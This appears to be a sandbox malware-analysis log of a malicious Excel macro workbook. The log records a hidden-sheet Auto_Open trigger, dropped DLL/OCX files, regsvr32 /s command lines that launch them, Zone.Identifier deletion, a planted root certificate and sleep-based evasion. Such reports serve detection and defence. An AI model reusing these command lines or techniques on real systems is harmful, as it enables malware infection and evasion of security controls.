                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_001C8C7C8_2_001C8C7C
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_001D0C7C8_2_001D0C7C
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_001C22798_2_001C2279
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_001C4E778_2_001C4E77
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_001D74738_2_001D7473
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_001E086F8_2_001E086F
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_001E0E6D8_2_001E0E6D
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_001C18658_2_001C1865
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_001DF0608_2_001DF060
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_001CD8998_2_001CD899
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_001DEC9B8_2_001DEC9B
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_001C5C9A8_2_001C5C9A
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_001D54978_2_001D5497
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_001D00978_2_001D0097
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_001C6A8D8_2_001C6A8D
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_001C508B8_2_001C508B
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_001DB6878_2_001DB687
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_001DA4B58_2_001DA4B5
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_001DD6B18_2_001DD6B1
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_001D16AD8_2_001D16AD
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_001D3CDD8_2_001D3CDD
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_001CCED88_2_001CCED8
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_001DDAD88_2_001DDAD8
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_001C72CC8_2_001C72CC
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_001C18F68_2_001C18F6
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_001DBAF28_2_001DBAF2
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_001E1AE98_2_001E1AE9
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_001C88E58_2_001C88E5
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_001C3F098_2_001C3F09
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_001C1B098_2_001C1B09
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_001DC5358_2_001DC535
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_001C19308_2_001C1930
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_001C91338_2_001C9133
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_001D112D8_2_001D112D
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_001D692B8_2_001D692B
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_001CBB238_2_001CBB23
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_001CDB598_2_001CDB59
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_001C43428_2_001C4342
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_001CE3798_2_001CE379
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_001D0F7A8_2_001D0F7A
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_001D5D688_2_001D5D68
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_001DC16B8_2_001DC16B
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_001C75998_2_001C7599
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_001C59958_2_001C5995
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_001DE18B8_2_001DE18B
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_001CF7848_2_001CF784
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_001DB3848_2_001DB384
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_001D91848_2_001D9184
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_001C77868_2_001C7786
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_001C9B808_2_001C9B80
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_001C4BB48_2_001C4BB4
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_001DAFB08_2_001DAFB0
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_001D95A88_2_001D95A8
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_001D1DA68_2_001D1DA6
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_001E27DF8_2_001E27DF
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_001CC7D18_2_001CC7D1
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_001D47D28_2_001D47D2
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_001D41CF8_2_001D41CF
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_001E13FD8_2_001E13FD
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_001E03F28_2_001E03F2
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_001D51E88_2_001D51E8
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_0047BE099_2_0047BE09
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_004804189_2_00480418
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_0047B4FC9_2_0047B4FC
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_0048EAA39_2_0048EAA3
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_004766B09_2_004766B0
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_00476CBB9_2_00476CBB
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_0047D3469_2_0047D346
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_0048D14C9_2_0048D14C
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_0049110E9_2_0049110E
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_004747009_2_00474700
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_004735119_2_00473511
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_0047F1D59_2_0047F1D5
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_00481FD09_2_00481FD0
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_004809F99_2_004809F9
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_004863F09_2_004863F0
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_0047E1A99_2_0047E1A9
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_0048F24C9_2_0048F24C
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_0049225A9_2_0049225A
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_00473C519_2_00473C51
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_004718659_2_00471865
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_00490E6D9_2_00490E6D
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_0049086F9_2_0049086F
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_0048F0609_2_0048F060
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_00474E779_2_00474E77
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_00480C7C9_2_00480C7C
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_004874739_2_00487473
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_00478C7C9_2_00478C7C
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_004722799_2_00472279
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_0047B2009_2_0047B200
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_004796179_2_00479617
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_00491E199_2_00491E19
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_0048DE119_2_0048DE11
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_0048E6129_2_0048E612
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_0047A01C9_2_0047A01C
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_0048B2159_2_0048B215
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_0048882F9_2_0048882F
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_0047F43B9_2_0047F43B
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_004772CC9_2_004772CC
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_0048DAD89_2_0048DAD8
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_00483CDD9_2_00483CDD
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_0047CED89_2_0047CED8
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_00491AE99_2_00491AE9
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_004788E59_2_004788E5
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_004718F69_2_004718F6
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_0048BAF29_2_0048BAF2
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_00476A8D9_2_00476A8D
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_0047508B9_2_0047508B
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_0048B6879_2_0048B687
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_0048EC9B9_2_0048EC9B
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_00475C9A9_2_00475C9A
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_0047D8999_2_0047D899
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_004854979_2_00485497
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_004800979_2_00480097
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_004816AD9_2_004816AD
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_0048D6B19_2_0048D6B1
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_0048A4B59_2_0048A4B5
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_004743429_2_00474342
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_0047DB599_2_0047DB59
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_00485D689_2_00485D68
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_0048C16B9_2_0048C16B
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_00480F7A9_2_00480F7A
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_0047E3799_2_0047E379
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_00473F099_2_00473F09
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_00471B099_2_00471B09
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_0048692B9_2_0048692B
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_0047BB239_2_0047BB23
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_0048112D9_2_0048112D
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_004791339_2_00479133
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_004719309_2_00471930
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_0048C5359_2_0048C535
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_004841CF9_2_004841CF
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_004927DF9_2_004927DF
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_0047C7D19_2_0047C7D1
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_004847D29_2_004847D2
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_004851E89_2_004851E8
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_004913FD9_2_004913FD
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_004903F29_2_004903F2
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_004777869_2_00477786
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_0048E18B9_2_0048E18B
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_0047F7849_2_0047F784
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_00479B809_2_00479B80
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_004891849_2_00489184
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_0048B3849_2_0048B384
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_004759959_2_00475995
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_004775999_2_00477599
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_004895A89_2_004895A8
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_00481DA69_2_00481DA6
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_00474BB49_2_00474BB4
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_0048AFB09_2_0048AFB0
                        Source: commenti_19265309.xlsm, Macro extractor: Sheet name: Je1
                        Source: commenti_19265309.xlsm, Macro extractor: Sheet name: Je2
                        Source: commenti_19265309.xlsm, Macro extractor: Sheet name: EFALGV
                        Source: Lg1r0mo1[1].dll.0.dr, Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                        Source: sei.ocx.0.dr, Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                        Source: workbook.xmlBinary string: <workbook xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" mc:Ignorable="x15 xr xr6 xr10 xr2" xmlns:x15="http://schemas.microsoft.com/office/spreadsheetml/2010/11/main" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr6="http://schemas.microsoft.com/office/spreadsheetml/2016/revision6" xmlns:xr10="http://schemas.microsoft.com/office/spreadsheetml/2016/revision10" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2"><fileVersion appName="xl" lastEdited="7" lowestEdited="7" rupBuild="22527"/><workbookPr/><mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006"><mc:Choice Requires="x15"><x15ac:absPath url="C:\Users\Admin\Desktop\File\1mar\CIR-ZV\" xmlns:x15ac="http://schemas.microsoft.com/office/spreadsheetml/2010/11/ac"/></mc:Choice></mc:AlternateContent><xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{BB1DE8A2-6C62-497D-9C8A-3A65EB24A263}" xr6:coauthVersionLast="45" xr6:coauthVersionMax="45" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/><bookViews><workbookView xWindow="-120" yWindow="-120" windowWidth="20730" windowHeight="11160" firstSheet="1" activeTab="1" xr2:uid="{00000000-000D-0000-FFFF-FFFF00000000}"/></bookViews><sheets><sheet name="Vfrbuk1" sheetId="2" state="hidden" r:id="rId1"/><sheet name="Sheet" sheetId="8" r:id="rId2"/><sheet name="Lefasbor1" sheetId="3" state="hidden" r:id="rId3"/><sheet name="EFALGV" sheetId="4" state="hidden" r:id="rId4"/><sheet name="Je1" sheetId="5" state="hidden" r:id="rId5"/><sheet name="Je2" sheetId="6" state="hidden" r:id="rId6"/></sheets><definedNames><definedName name="DDDDD1">#REF!</definedName><definedName name="DDWD">#REF!</definedName><definedName 
name="DDWD1">#REF!</definedName><definedName name="DDWD2">#REF!</definedName><definedName name="DDWD3">#REF!</definedName><definedName name="DDWD4">#REF!</definedName><definedName name="GFGH1">EFALGV!$D$10</definedName><definedName name="GFGH2">EFALGV!$D$12</definedName><definedName name="GFGH3">EFALGV!$D$14</definedName><definedName name="GFGH4">EFALGV!$D$16</definedName><definedName name="GFGH5">EFALGV!$D$18</definedName><definedName name="GFGH6">EFALGV!$D$20</definedName><definedName name="KKLD8">#REF!</definedName><definedName name="_xlnm.Auto_Open">EFALGV!$D$1</definedName></definedNames><calcPr calcId="191029"/><extLst><ext uri="{B58B0392-4F1F-4190-BB64-5DF3571DCE5F}" xmlns:xcalcf="http://schemas.microsoft.com/office/spreadsheetml/2018/calcfeatures"><xcalcf:calcFeatures><xcalcf:feature name="microsoft.com:RD"/><xcalcf:feature name="microsoft.com:FV"/></xcalcf:calcFeatures></ext></extLst></workbook>
                        Source: C:\Windows\SysWOW64\regsvr32.exe, Memory allocated: 76F90000 page execute and read and write
                        Source: C:\Windows\SysWOW64\regsvr32.exe, Memory allocated: 76E90000 page execute and read and write
                        Source: C:\Windows\SysWOW64\regsvr32.exeFile created: C:\Windows\SysWOW64\Ufazcuvgqkvqusea\Jump to behavior
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: String function: 1004EC35 appears 31 times
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: String function: 1001E302 appears 58 times
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: String function: 1004764D appears 247 times
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: String function: 10009F4E appears 32 times
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: String function: 100491EC appears 83 times
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: String function: 10047680 appears 48 times
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$commenti_19265309.xlsmJump to behavior
                        Source: classification engineClassification label: mal100.troj.expl.evad.winXLSM@27/5@1/41
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_10007DD4 LoadResource,SizeofResource,VirtualAllocExNuma,VirtualAlloc,memcpy,malloc,??3@YAXPAX@Z,_printf,3_2_10007DD4
                        Source: regsvr32.exe, 0000000D.00000002.511010476.0000000000403000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: COM;.EXE;.BAT;.CMD;.VBp
                        Source: commenti_19265309.xlsmReversingLabs: Detection: 51%
                        Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                        Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWow64\regsvr32.exe /s ..\sei.ocx
                        Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Ufazcuvgqkvqusea\tadr.wns"
                        Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Pvpcradve\zcxodsyppc.vhu"
                        Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Akcjix\aahvlaakfpltdqe.tfa"
                        Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Iemtm\pldpzerct.pbt"
                        Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Norixqjmezaqkg\rmjvbhreoaju.ozu"
                        Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Wlsoaenkkrveuupx\vqctv.ugg"
                        Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Fjfbdmakik\lfmekztlcu.eak"
                        Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Qjxnmbewg\psrzxbseam.bej"
                        Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Xuxdamzseerbd\xnhieyc.mhi"
                        Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Txlhge\upsbekiq.mnw"
                        Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Qitnzewoiifn\ioax.zvc"
                        Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Wjrcyousgqt\whqvqq.kkc"
                        Source: C:\Windows\SysWOW64\regsvr32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32Jump to behavior
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRE639.tmpJump to behavior
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_1003B247 CoCreateInstance,CoCreateInstance,CoCreateInstance,OleRun,3_2_1003B247
                        Source: C:\Windows\SysWOW64\regsvr32.exeFile read: C:\Windows\System32\drivers\etc\hosts
                        Source: Window RecorderWindow detected: More than 3 window changes detected
                        Source: commenti_19265309.xlsmInitial sample: OLE zip file path = xl/media/image1.png
                        Source: commenti_19265309.xlsmInitial sample: OLE zip file path = xl/worksheets/_rels/sheet2.xml.rels
                        Source: commenti_19265309.xlsmInitial sample: OLE zip file path = xl/worksheets/_rels/sheet3.xml.rels
                        Source: commenti_19265309.xlsmInitial sample: OLE zip file path = xl/printerSettings/printerSettings2.bin
                        Source: commenti_19265309.xlsmInitial sample: OLE zip file path = xl/calcChain.xml
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_10049231 push ecx; ret 3_2_10049244
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_10047725 push ecx; ret 3_2_10047738
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_10059DC8 __decode_pointer,LoadLibraryA,GetProcAddress,GetLastError,GetLastError,GetLastError,__encode_pointer,InterlockedExchange,FreeLibrary,3_2_10059DC8
                        Source: Lg1r0mo1[1].dll.0.drStatic PE information: section name: .didat
                        Source: sei.ocx.0.drStatic PE information: section name: .didat
                        Source: C:\Windows\SysWOW64\regsvr32.exeFile created: C:\Windows\SysWOW64\Ufazcuvgqkvqusea\tadr.wns (copy)Jump to dropped file
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\sei.ocxJump to dropped file
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\Lg1r0mo1[1].dllJump to dropped file

                        Boot Survival

                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\sei.ocxJump to dropped file

                        Hooking and other Techniques for Hiding and Protection

                        Source: C:\Windows\SysWOW64\regsvr32.exeFile opened: C:\Windows\SysWOW64\Ufazcuvgqkvqusea\tadr.wns:Zone.Identifier read attributes | deleteJump to behavior
                        Source: C:\Windows\SysWOW64\regsvr32.exeFile opened: C:\Windows\SysWOW64\Pvpcradve\zcxodsyppc.vhu:Zone.Identifier read attributes | deleteJump to behavior
                        Source: C:\Windows\SysWOW64\regsvr32.exeFile opened: C:\Windows\SysWOW64\Akcjix\aahvlaakfpltdqe.tfa:Zone.Identifier read attributes | deleteJump to behavior
                        Source: C:\Windows\SysWOW64\regsvr32.exeFile opened: C:\Windows\SysWOW64\Iemtm\pldpzerct.pbt:Zone.Identifier read attributes | deleteJump to behavior
                        Source: C:\Windows\SysWOW64\regsvr32.exeFile opened: C:\Windows\SysWOW64\Norixqjmezaqkg\rmjvbhreoaju.ozu:Zone.Identifier read attributes | deleteJump to behavior
                        Source: C:\Windows\SysWOW64\regsvr32.exeFile opened: C:\Windows\SysWOW64\Wlsoaenkkrveuupx\vqctv.ugg:Zone.Identifier read attributes | deleteJump to behavior
                        Source: C:\Windows\SysWOW64\regsvr32.exeFile opened: C:\Windows\SysWOW64\Fjfbdmakik\lfmekztlcu.eak:Zone.Identifier read attributes | deleteJump to behavior
                        Source: C:\Windows\SysWOW64\regsvr32.exeFile opened: C:\Windows\SysWOW64\Qjxnmbewg\psrzxbseam.bej:Zone.Identifier read attributes | deleteJump to behavior
                        Source: C:\Windows\SysWOW64\regsvr32.exeFile opened: C:\Windows\SysWOW64\Xuxdamzseerbd\xnhieyc.mhi:Zone.Identifier read attributes | deleteJump to behavior
                        Source: C:\Windows\SysWOW64\regsvr32.exeFile opened: C:\Windows\SysWOW64\Txlhge\upsbekiq.mnw:Zone.Identifier read attributes | deleteJump to behavior
                        Source: C:\Windows\SysWOW64\regsvr32.exeFile opened: C:\Windows\SysWOW64\Qitnzewoiifn\ioax.zvc:Zone.Identifier read attributes | delete
                        Source: C:\Windows\SysWOW64\regsvr32.exeFile opened: C:\Windows\SysWOW64\Wjrcyousgqt\whqvqq.kkc:Zone.Identifier read attributes | delete
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_100014C4 IsIconic,3_2_100014C4
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_100111D8 IsIconic,GetWindowPlacement,GetWindowRect,3_2_100111D8
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_1002870B __EH_prolog3,IsIconic,SetForegroundWindow,SendMessageA,PostMessageA,3_2_1002870B
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_100369AF IsWindowVisible,IsIconic,3_2_100369AF
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_10006B1C IsIconic,SendMessageA,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetClientRect,DrawIcon,3_2_10006B1C
                        Source: C:\Windows\SysWOW64\regsvr32.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob
                        Source: C:\Windows\SysWOW64\regsvr32.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2724Thread sleep time: -60000s >= -30000sJump to behavior
                        Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2028Thread sleep time: -180000s >= -30000sJump to behavior
                        Source: C:\Windows\SysWOW64\regsvr32.exe TID: 760Thread sleep time: -240000s >= -30000sJump to behavior
